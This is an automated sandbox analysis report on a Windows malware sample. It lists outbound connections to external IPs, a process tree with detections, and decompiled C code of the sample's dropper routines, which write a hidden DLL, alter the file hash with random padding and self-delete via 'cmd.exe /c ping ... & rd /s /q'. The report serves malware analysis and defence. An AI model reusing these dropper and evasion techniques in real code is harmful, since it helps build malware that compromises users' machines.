                                                  Feb 8, 2023 11:59:58.669246912 CET4974018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:58.731676102 CET4974118963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:58.872374058 CET4974280192.168.2.3202.108.0.52
                                                  Feb 8, 2023 11:59:59.571732044 CET4974318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:59.692763090 CET4974418963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 11:59:59.707258940 CET4974580192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:02.732045889 CET4974418963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:02.736036062 CET4974318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:02.872678995 CET4974580192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:03.813931942 CET4974618963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:03.820692062 CET497476658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 12:00:04.698846102 CET4974818963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:05.408726931 CET4974980192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:06.841785908 CET4974618963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:06.872956038 CET497476658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 12:00:07.732431889 CET4974818963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:07.856117010 CET4975018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:07.989873886 CET4975118963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:08.391654015 CET4975280192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:11.045146942 CET4975018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:11.060791016 CET4975118963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:11.560895920 CET4975280192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:11.923332930 CET4975318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:12.113703012 CET4975418963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:12.327521086 CET4975580192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:12.873562098 CET497476658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 12:00:15.052284956 CET4975318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:15.170641899 CET4975418963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:15.342403889 CET4975580192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:16.004266024 CET4975618963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:16.169240952 CET4975718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:16.251070023 CET4975880192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:19.061598063 CET4975618963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:19.233439922 CET4975718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:19.374068975 CET4975880192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:20.099982977 CET4975918963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:20.230170965 CET4976018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:20.263588905 CET4976180192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:23.233683109 CET4975918963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:23.233690977 CET4976018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:23.374392033 CET4976180192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:24.675895929 CET4976218963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:24.795388937 CET4976318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:24.971731901 CET4976480192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:25.004843950 CET497656658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 12:00:27.734087944 CET4976218963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:27.874702930 CET4976318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:28.046654940 CET4976480192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:28.062344074 CET497656658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 12:00:28.748872995 CET4976618963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:28.973664045 CET4976718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:29.231781006 CET4976880192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:31.843785048 CET4976618963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:32.062583923 CET4976718963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:32.375178099 CET4976880192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:32.742732048 CET4976918963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:32.855957031 CET4977018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:33.289069891 CET4977180192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:34.062740088 CET497656658192.168.2.3107.163.56.251
                                                  Feb 8, 2023 12:00:35.847755909 CET4976918963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:35.875395060 CET4977018963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:36.344181061 CET4977180192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:36.758208990 CET4977218963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:36.869148016 CET4977318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:36.916143894 CET4977480192.168.2.3202.108.0.52
                                                  Feb 8, 2023 12:00:39.766365051 CET4977218963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:39.875749111 CET4977318963192.168.2.3107.163.56.232
                                                  Feb 8, 2023 12:00:39.922668934 CET4977480192.168.2.3202.108.0.52


                                                  Target ID:0
                                                  Start time:11:58:31
                                                  Start date:08/02/2023
                                                  Path:C:\Users\user\Desktop\02hNixBIvP.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\02hNixBIvP.exe
                                                  Imagebase:0x400000
                                                  File size:272037 bytes
                                                  MD5 hash:003F93A1F33EC617B46A87C98B19FD85
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:1
                                                  Start time:11:58:32
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
                                                  Imagebase:0xb0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:2
                                                  Start time:11:58:32
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:3
                                                  Start time:11:58:32
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 2
                                                  Imagebase:0xbf0000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:4
                                                  Start time:11:58:33
                                                  Start date:08/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\ifaie.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
                                                  Imagebase:0x400000
                                                  File size:272305 bytes
                                                  MD5 hash:A14885E3017A4DDC08143092526DFC7B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: CN_Honker_Webshell, Description: Sample from CN Honker Pentest Toolset - file Webshell.exe, Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Author: Florian Roth (Nextron Systems)
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  Target ID:5
                                                  Start time:11:58:34
                                                  Start date:08/02/2023
                                                  Path:C:\Program Files\lhnfbdjfh\hcl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe
                                                  Imagebase:0x3c0000
                                                  File size:61952 bytes
                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:high

                                                  Target ID:17
                                                  Start time:11:59:08
                                                  Start date:08/02/2023
                                                  Path:C:\Program Files\lhnfbdjfh\hcl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
                                                  Imagebase:0x3c0000
                                                  File size:61952 bytes
                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:18
                                                  Start time:11:59:09
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
                                                  Imagebase:0xb0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:19
                                                  Start time:11:59:09
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:20
                                                  Start time:11:59:09
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 3
                                                  Imagebase:0xbf0000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:21
                                                  Start time:11:59:17
                                                  Start date:08/02/2023
                                                  Path:C:\Program Files\lhnfbdjfh\hcl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
                                                  Imagebase:0x3c0000
                                                  File size:61952 bytes
                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:22
                                                  Start time:11:59:17
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
                                                  Imagebase:0xb0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:23
                                                  Start time:11:59:17
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:24
                                                  Start time:11:59:18
                                                  Start date:08/02/2023
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 3
                                                  Imagebase:0xbf0000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language


                                                    Execution Graph

                                                    Execution Coverage:1.7%
                                                    Dynamic/Decrypted Code Coverage:14.6%
                                                    Signature Coverage:33%
                                                    Total number of Nodes:103
                                                    Total number of Limit Nodes:5

                                                    Control-flow Graph

                                                    C-Code - Quality: 70%
                                                    			E004013B9() {
                                                    				long _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				long _v20;
                                                    				long _v24;
                                                    				void* _v39;
                                                    				void _v40;
                                                    				void* _v44;
                                                    				void* _v48;
                                                    				struct _STARTUPINFOA _v116;
                                                    				struct _PROCESS_INFORMATION _v132;
                                                    				char _v168;
                                                    				void _v427;
                                                    				char _v428;
                                                    				void _v687;
                                                    				char _v688;
                                                    				void _v947;
                                                    				char _v948;
                                                    				void _v1207;
                                                    				char _v1208;
                                                    				void _v1719;
                                                    				char _v1720;
                                                    				int _t108;
                                                    				void* _t136;
                                                    				signed int _t138;
                                                    				signed int _t139;
                                                    				signed int _t177;
                                                    				signed int _t194;
                                                    				signed int _t201;
                                                    				signed int _t202;
                                                    				signed int _t206;
                                                    				signed int _t210;
                                                    				signed int _t214;
                                                    				signed int _t215;
                                                    				signed int _t218;
                                                    				struct HRSRC__* _t220;
                                                    				signed int _t222;
                                                    				void* _t243;
                                                    				void* _t245;
                                                    				void* _t251;
                                                    				void* _t252;
                                                    				void* _t254;
                                                    				void* _t257;
                                                    
                                                    				_pop(_t219);
                                                    				_pop(_t241);
                                                    				_pop(_t191);
                                                    				_t252 = _t251 - 0x6b4;
                                                    				_t220 = FindResourceA(0, 0x82, "GUI");
                                                    				if(_t220 != 0) {
                                                    					_t243 = LoadResource(0, _t220);
                                                    					if(_t243 != 0) {
                                                    						_t108 = SizeofResource(0, _t220);
                                                    						_v8 = _t108;
                                                    						memcpy(_t243, LockResource(_t243), _t108);
                                                    						_v16 =  *_t243 & 0x000000ff;
                                                    						_t254 = _t252 + 0xc;
                                                    						_t222 = 0;
                                                    						_v12 =  *(_t243 + 1) & 0x000000ff;
                                                    						if(_v8 > 0) {
                                                    							do {
                                                    								asm("cdq");
                                                    								_t214 = 3;
                                                    								_t218 = _t222 % _t214;
                                                    								if(_t218 == 2) {
                                                    									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v16;
                                                    								}
                                                    								if(_t218 == 1) {
                                                    									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12;
                                                    								}
                                                    								if(_t218 == 0) {
                                                    									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12 + _v16;
                                                    								}
                                                    								_t222 = _t222 + 1;
                                                    							} while (_t222 < _v8);
                                                    						}
                                                    						_t194 = 0x40;
                                                    						_v428 = 0;
                                                    						_push(0x40);
                                                    						memset( &_v427, 0, _t194 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v688 = 0;
                                                    						memset( &_v687, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v40 = 0;
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosd");
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
                                                    						_t257 = _t254 + 0x2c;
                                                    						if(CreateDirectoryA( &_v428, 0) == 0) {
                                                    							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
                                                    							_t257 = _t257 + 0xc;
                                                    							CreateDirectoryA( &_v428, 0);
                                                    						}
                                                    						Sleep(0x64);
                                                    						SetFileAttributesA( &_v428, 2);
                                                    						memset( &_v40, 0, 0x10);
                                                    						E0040107C( &_v40, 5);
                                                    						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
                                                    						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0);
                                                    						_v44 = _t136;
                                                    						WriteFile(_t136, _t243, _v8,  &_v24, 0);
                                                    						_t138 = rand();
                                                    						asm("cdq");
                                                    						_t139 = _t138 / 0xff;
                                                    						_t215 = _t138 % 0xff;
                                                    						_push(_t215);
                                                    						_v20 = _t215;
                                                    						L004151F6();
                                                    						_v48 = _t139;
                                                    						_t201 = _v20;
                                                    						if(_t201 > 0) {
                                                    							_v12 = 0xfa;
                                                    							_v8 = _t139;
                                                    							_v12 = _v12 - _t139;
                                                    							_v16 = _t201;
                                                    							do {
                                                    								_t177 = rand();
                                                    								asm("cdq");
                                                    								_v8 = _v8 + 1;
                                                    								_t67 =  &_v16;
                                                    								 *_t67 = _v16 - 1;
                                                    								 *_v8 = _t177 % (_v12 + _v8);
                                                    							} while ( *_t67 != 0);
                                                    						}
                                                    						_t245 = _v44;
                                                    						WriteFile(_t245, _v48, _v20,  &_v24, 0);
                                                    						SetFilePointer(_t245, 0, 0, 0);
                                                    						WriteFile(_t245, "MZ", 2,  &_v24, 0);
                                                    						CloseHandle(_t245);
                                                    						_t202 = 8;
                                                    						memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t202 << 2);
                                                    						asm("movsw");
                                                    						_push(0x40);
                                                    						_v948 = 0;
                                                    						memset( &_v947, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						memset( &_v40, 0, 0x10);
                                                    						E0040107C( &_v40, 3);
                                                    						wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
                                                    						CopyFileA( &_v168,  &_v948, 0);
                                                    						_t206 = 0x7f;
                                                    						_v1720 = 0;
                                                    						_push(0x40);
                                                    						memset( &_v1719, 0, _t206 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v1208 = 0;
                                                    						memset( &_v1207, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						GetModuleFileNameA(0,  &_v1208, 0x104);
                                                    						wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
                                                    						_t210 = 0x10;
                                                    						memset( &(_v116.lpReserved), 0, _t210 << 2);
                                                    						_v116.cb = 0x44;
                                                    						_v116.lpDesktop = "WinSta0\\Default";
                                                    						_v116.wShowWindow = 0;
                                                    						CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132);
                                                    						_push(1);
                                                    						_pop(0);
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
                                                    • LockResource.KERNEL32(00000000,00000000), ref: 00401403
                                                    • memcpy.MSVCRT ref: 0040140B
                                                    • wsprintfA.USER32 ref: 004014B3
                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 004014C0
                                                    • wsprintfA.USER32 ref: 004014DA
                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 004014E7
                                                    • Sleep.KERNEL32(00000064), ref: 004014EF
                                                    • SetFileAttributesA.KERNEL32(?,00000002), ref: 004014FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateDirectorywsprintf$AttributesFileFindLoadLockSizeofSleepmemcpy
                                                    • String ID: GUI
                                                    • API String ID: 3499318318-1113068146
                                                    • Opcode ID: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
                                                    • Instruction ID: 7681a7971a44aff1cfd63152e6ce6ab61ae4c3c5426a1299c50ffc8ee6258244
                                                    • Opcode Fuzzy Hash: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
                                                    • Instruction Fuzzy Hash: 07E086773443243BD22035BDACCDC973E9CC3C47A6B110837FA03E21D2A8794C4541A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 58%
                                                    			E00401194() {
                                                    				long _v8;
                                                    				int _v12;
                                                    				void* _v16;
                                                    				void* _v20;
                                                    				int _v24;
                                                    				void* _v28;
                                                    				long _v32;
                                                    				void* _v47;
                                                    				char _v48;
                                                    				void _v307;
                                                    				char _v308;
                                                    				void _v567;
                                                    				char _v568;
                                                    				void _v827;
                                                    				char _v828;
                                                    				void _v1851;
                                                    				char _v1852;
                                                    				void* _t55;
                                                    				signed int _t66;
                                                    				void* _t77;
                                                    				int _t78;
                                                    				signed int _t97;
                                                    				intOrPtr _t99;
                                                    				intOrPtr _t100;
                                                    				void* _t106;
                                                    				signed int _t107;
                                                    				signed int _t111;
                                                    				void* _t120;
                                                    				int _t126;
                                                    				void* _t134;
                                                    				void* _t136;
                                                    				void* _t144;
                                                    
                                                    				L004151F6(); // executed
                                                    				_t120 = _t55;
                                                    				_v20 = _t120;
                                                    				memset(_t120, 0, 0x100000);
                                                    				_v12 = 0;
                                                    				E004010DF(_t106, _t144, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x100000))))),  &_v12); // executed
                                                    				_t136 = _t134 + 0x1c;
                                                    				_t145 =  *_t120 - 0x4d;
                                                    				if( *_t120 == 0x4d) {
                                                    					L2:
                                                    					_t107 = 0x40;
                                                    					_v308 = 0;
                                                    					_v48 = 0;
                                                    					memset( &_v307, 0, _t107 << 2);
                                                    					asm("stosw");
                                                    					asm("stosb");
                                                    					asm("stosd");
                                                    					asm("stosd");
                                                    					asm("stosd");
                                                    					asm("stosw");
                                                    					asm("stosb");
                                                    					E0040107C( &_v48, 5);
                                                    					_t66 = GetTickCount();
                                                    					_v8 = _t66 & 0x000001ff;
                                                    					_t111 = 0x40;
                                                    					_v568 = 0;
                                                    					memset( &_v567, 0, _t111 << 2);
                                                    					asm("stosw");
                                                    					asm("stosb");
                                                    					GetTempPathA(0x104,  &_v568);
                                                    					wsprintfA( &_v308, "%s\\%s.exe",  &_v568,  &_v48);
                                                    					_t77 = CreateFileA( &_v308, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                    					_v16 = _t77;
                                                    					_t78 =  *0x417270(0);
                                                    					srand(_t78);
                                                    					_push(_v8);
                                                    					L004151F6();
                                                    					_t126 = _t78;
                                                    					_v24 = 0;
                                                    					_v28 = _t126;
                                                    					if(_v8 <= 0) {
                                                    						L4:
                                                    						Sleep(0x64); // executed
                                                    						WriteFile(_v16, _v20, _v12,  &_v32, 0); // executed
                                                    						Sleep(0x64); // executed
                                                    						WriteFile(_v16, _v28, _v8,  &_v32, 0); // executed
                                                    						FindCloseChangeNotification(_v16); // executed
                                                    						L004151EA();
                                                    						L004151EA(); // executed
                                                    						_v1852 = 0;
                                                    						memset( &_v1851, 0, 0xff << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v828 = 0;
                                                    						memset( &_v827, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_push( *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x40, _v20, _v28))))));
                                                    						_push( &_v828);
                                                    						L004153C0();
                                                    						wsprintfA( &_v1852, "cmd.exe /c ping 127.0.0.1 -n 2&%s \"%s\"",  &_v308,  &_v828);
                                                    						WinExec( &_v1852, 0); // executed
                                                    						Sleep(0x1f4); // executed
                                                    						ExitProcess(0xffffffff);
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    					do {
                                                    						L3:
                                                    						_t97 = rand();
                                                    						asm("cdq");
                                                    						_t99 = _v24;
                                                    						 *((char*)(_t99 + _t126)) = _t97 % 0xff - _t99;
                                                    						_t100 = _t99 + 1;
                                                    						_v24 = _t100;
                                                    					} while (_t100 < _v8);
                                                    					goto L4;
                                                    				} else {
                                                    					goto L1;
                                                    				}
                                                    				do {
                                                    					L1:
                                                    					E004010DF(_t106, _t145, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284())))),  &_v12);
                                                    					_t136 = _t136 + 0xc;
                                                    					Sleep(0x64);
                                                    				} while ( *_t120 != 0x4d);
                                                    				goto L2;
                                                    			}

                                                    APIs
                                                    • memset.MSVCRT ref: 004011B5
                                                    • __p___argv.MSVCRT ref: 004011C4
                                                      • Part of subcall function 004010DF: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A
                                                    • __p___argv.MSVCRT ref: 004011E6
                                                      • Part of subcall function 004010DF: memset.MSVCRT ref: 00401141
                                                      • Part of subcall function 004010DF: ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401159
                                                      • Part of subcall function 004010DF: memcpy.MSVCRT ref: 00401174
                                                      • Part of subcall function 004010DF: FindCloseChangeNotification.KERNELBASE(?), ref: 00401186
                                                    • Sleep.KERNEL32(00000064), ref: 004011FB
                                                    • GetTickCount.KERNEL32 ref: 00401233
                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 00401263
                                                    • wsprintfA.USER32 ref: 00401280
                                                    • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
                                                    • time.MSVCRT ref: 004012AA
                                                    • srand.MSVCRT ref: 004012B1
                                                    • rand.MSVCRT ref: 004012CF
                                                    • Sleep.KERNELBASE(00000064), ref: 004012F0
                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00401306
                                                    • Sleep.KERNELBASE(00000064), ref: 0040130A
                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040131A
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040131F
                                                    • __p___argv.MSVCRT ref: 00401363
                                                    • _mbscpy.MSVCRT ref: 00401374
                                                    • wsprintfA.USER32 ref: 00401393
                                                    • WinExec.KERNEL32(?,00000000), ref: 004013A4
                                                    • Sleep.KERNELBASE(000001F4), ref: 004013AF
                                                    • ExitProcess.KERNEL32 ref: 004013B3
                                                    Strings
                                                    • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 0040138D
                                                    • %s\%s.exe, xrefs: 0040127A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: File$Sleep$__p___argv$ChangeCloseCreateFindNotificationWritememsetwsprintf$CountExecExitPathProcessReadTempTick_mbscpymemcpyrandsrandtime
                                                    • String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                    • API String ID: 3742635431-2816570591
                                                    • Opcode ID: 7c0aa4d6032f19efc6f0574d2b02c73672e5a55c5a30703d20692792e0339aea
                                                    • Instruction ID: d2297b8266ecacfc823cd110b5f5006d7f60a8736864fb2ea4bbb2a36b220300
                                                    • Opcode Fuzzy Hash: 7c0aa4d6032f19efc6f0574d2b02c73672e5a55c5a30703d20692792e0339aea
                                                    • Instruction Fuzzy Hash: E8515B72D44209BFDB11ABE4CC89ADEBFB9EB48300F1044B6F204E6160DA795B44CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 46%
                                                    			E00415410(void* __ebx, void* __edi, void* __esi) {
